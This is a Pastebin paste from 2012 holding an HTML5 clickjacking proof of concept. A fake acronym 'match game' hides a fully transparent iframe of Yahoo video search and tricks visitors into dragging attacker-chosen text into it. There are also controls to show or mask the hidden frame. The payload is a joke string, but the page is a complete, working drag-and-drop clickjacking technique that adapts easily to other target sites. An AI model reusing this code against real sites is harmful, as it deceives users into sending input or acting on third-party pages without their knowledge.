API tools faq
paste
Advertisement
scriptmonkey

Leveraging HTML5 for more efficient clickjacking attacks.

scriptmonkey
Apr 10th, 2012
539
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 2.58 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2.   <head>
  3.     <title>HTML Clickjacking demonstration - drag and WTF!?</title>
  4.     <style>
  5.       iframe{position: absolute; top:0px; left:0; filter: alpha(opacity=0); opacity:0;z-index:1}
  6.       button{position: absolute; top:40px; left: 805px; z-index:-1; width:107px; height:26px;}
  7.       .magicfield1{position: absolute; top:40px; left: 340px; z-index:-1; height: 26px; border: 1px solid orange}
  8.       .magicfield2{position: absolute; top:40px; left: 480px; z-index:-1; height: 26px; border: 1px solid orange}
  9.       .magicfield3{position: absolute; top:40px; left: 650px; z-index:-1; height: 26px; border: 1px solid orange}
  10.       .magictext{position: absolute; top:54%; left: 50%; z-index:-1; }
  11.       .showhider{position: absolute; top:90%; left: 1%}
  12.       .intro{position: absolute; top:50%; left:0}
  13.     </style>
  14.     <script type="text/javascript">
  15.       function mask(){
  16.         document.getElementById("iframe").style.opacity = ".1"; // for most browsers  
  17.         document.getElementById("iframe").style.filter = "alpha(opacity=10)"; // for IE
  18.       }
  19.       function hide(){
  20.         document.getElementById("iframe").style.opacity = ".0"; // for most browsers  
  21.         document.getElementById("iframe").style.filter = "alpha(opacity=0)"; // for IE
  22.       }
  23.       function show(){
  24.         document.getElementById("iframe").style.opacity = ".9"; // for most browsers;  
  25.         document.getElementById("iframe").style.filter = "alpha(opacity=90)"; // for IE  
  26.       }
  27.       function reveal(){
  28.         alert("Checking your answer...");
  29.         document.getElementById("iframe").style.opacity = ".9"; // for most browsers
  30.         document.getElementById("iframe").style.filter = "alpha(opacity=90)"; //for IE
  31.       }
  32.     </script>
  33.   </head>
  34.   <body>
  35.     <div class="intro">
  36.       <p>Hello and welcome to the match game</p>
  37.       <p>All you have to do is drag the following 3 letter acronym to the matching string ---> </p>
  38.       <p class="showhider">As you know it's a test - <a onClick="show()">Show iframe</a> - <a onClick="hide()">Hide iframe</a> - <a onClick="mask()">Mask iframe</a> </p>
  39.     </div>
  40.     <div class="magictext" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Rick Astley')">
  41.       <H1 style="border: 1px dashed black">CSS</H1>
  42.     </div>
  43.     <iframe src="http://video.search.yahoo.com/" width="99%" id="iframe" height="50%"></iframe>
  44.     <span class=magicfield1>Cross Site Scripting</span><span class=magicfield2>Cuddly Slippery Snakes</span> <span class="magicfield3">Cascading Style Sheets</span>
  45.     <button>Answer</button>
  46.   </body>
  47. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!